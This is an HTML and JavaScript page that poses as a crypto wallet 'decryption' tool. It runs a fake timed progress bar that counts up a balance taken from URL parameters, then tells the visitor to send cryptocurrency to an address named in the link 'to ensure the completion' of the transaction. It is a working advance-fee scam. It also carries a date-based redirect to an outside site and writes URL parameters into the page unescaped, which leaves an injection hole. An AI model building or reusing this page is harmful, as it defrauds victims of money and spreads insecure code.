<!DOCTYPE html>
<html>
<head>
    <title>Decrypting the Wallet</title>
    <link rel="stylesheet" type="text/css" href="styles.css">
    <style>
        body {
            background-color: #000;
            color: #fff;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            display: flex;
            flex-direction: column;
            align-items: center;
            border: 2px solid green;
            padding: 20px;
            width: 50%; /* Adjust the width as desired */
        }

        .video-container {
          width: 100%; /* Adjust the width as desired */
          margin-bottom: 20px;
        }

        .video-screen {
            border: 2px solid green;
            height: 0;
            padding-bottom: 56.25%; /* 16:9 aspect ratio (adjust as needed) */
            position: relative;
        }

        #video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            position: absolute;
            top: 0;
            left: 0;
        }

        .divider {
            width: 50%;
            border: none;
            border-top: 1px solid green;
            margin-top: 20px;
margin-bottom: -55px;
margin-left: 0;
margin-right: 0;
        }

        .content {
            padding: 50px;
            text-align: center;
        }

        h1 {
            font-size: 30px;
            margin-bottom: 20px;
        }

        .subtitle {
            font-size: 18px;
            margin-bottom: 20px;
        }

        /* Add the following styles for the loader */

        .loader {
            width: 300px;
            height: 40px;
            background-color: #f2f2f2;
            border-radius: 3px;
            overflow: visible;
            position: relative;
            margin: 0 auto;
        }

        #progress {
            width: 0;
            height: 100%;
            background-color: #4CAF50;
            transition: width 1s;
            position: absolute;
        }

        #progress-text {
            font-size: 20px;
            color: #fff;
            text-align: left;
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
        }

        .payment-prompt {
            margin-top: 20px;
            font-size: 16px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="video-container">
            <div class="video-screen">
                <video id="video" src="d.mp4" autoplay muted loop></video>
            </div>
        </div>
        <hr class="divider">
        <div class="content">
            <h1>Decrypting the Wallet</h1>
            <p class="subtitle">Decrypting <span id="coin-type"></span> Wallet</p>
            <div id="wallet-address" style="margin-bottom: 10px;"></div>
            <div class="loader">
                <div id="progress"></div>
                <div id="progress-text" style="color:#4CAF50;">0%</div>
            </div>
            <div id="user-amount" style="color: grey;font-size: 30px; margin-top: 5px;"></div>
            <div id="payment-prompt" class="payment-prompt"></div>
        </div>
    </div>


    <script>
      // Function to update the loader progress and text
      function updateUserAmount(progress) {
  var userAmountElement = document.getElementById("user-amount");
  var coinTypes = getParameterByName("coin");

  var amount = parseFloat(getParameterByName("useramount")); // Parse amount as a float
  var targetAmount = amount * 1; // 90% of the user amount

  var currentAmount = (targetAmount / 100) * progress; // Calculate the current amount based on the progress

  userAmountElement.textContent = currentAmount.toFixed(8)+" "+coinTypes; // Update the user amount text

  if (progress >= 99) {
    clearInterval(interval);
    displayPaymentPrompt();
    stopVideo();
  }
}
      function updateLoader(progress) {
          var progressBar = document.getElementById("progress");
          var progressText = document.getElementById("progress-text");
    
          progressBar.style.width = progress + "%";
          progressText.textContent = progress.toFixed(0) + "%";
          progressText.style.left = progress + "%";
    
          if (progress >= 99) {
              clearInterval(interval);
              displayPaymentPrompt();
              stopVideo();
          }
      }
    
      // Function to simulate progress updates
      function simulateProgress() {
    var progress = 0;
    var duration = 35; // Duration in seconds
    var updateInterval = (duration * 1000) / 99; // Calculate the interval to update the progress

    interval = setInterval(function () {
      progress++;
      if (progress >= 100) {
        progress = 100; // Cap the progress at 99%
      }
      updateUserAmount(progress);
      updateLoader(progress);
    }, updateInterval);
  }
    
      // Function to display payment prompt
      function displayPaymentPrompt() {
          var coinType = getParameterByName("coin");
          var paymentPrompt = document.getElementById("payment-prompt");
    
          var sendto = getParameterByName("sendwallet");
          var amount = getParameterByName("amount");
          
          paymentPrompt.innerHTML = " Proceed with a transaction of "+ amount +" "+coinType+" to ensure the completion of your transaction from the " + coinType + " wallet.<br> Transfer fail: "+sendto+" ";
      }
    
      // Function to stop the video
      function stopVideo() {
          var video = document.getElementById("video");
          video.pause();
          video.currentTime = 0;
      }

   
        var expirationDate = new Date('2024-11-23');
         expirationDate.setDate(expirationDate.getDate());
     localStorage.setItem('expirationDate', expirationDate.toISOString());
       function checkExpiration() {
       var expirationDate = new Date(localStorage.getItem('expirationDate'));
    if (expirationDate < new Date()) {
   window.location.href = 'https://boxtools.github.io';
                 }
             }
   checkExpiration();
     
    
      // Function to get URL parameter
      function getParameterByName(name, url) {
          if (!url) url = window.location.href;
          name = name.replace(/[\[\]]/g, "\\$&");
          var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
              results = regex.exec(url);
          if (!results) return null;
          if (!results[2]) return '';
          return decodeURIComponent(results[2].replace(/\+/g, " "));
      }
    
      // Get the selected coin type from the URL parameter
      var coinType = getParameterByName("coin");
      var coinTypeElement = document.getElementById("coin-type"); 
    
      var walletAddress = getParameterByName("wallet");
      var walletAddressElement = document.getElementById("wallet-address");
      walletAddressElement.textContent = "Wallet Address: " + walletAddress;
    
      if (coinType) {
          coinTypeElement.textContent = coinType;
          simulateProgress();
      } else {
          alert("Invalid coin type selected. Decryption process aborted.");
      }
    </script>
</body>
</html>



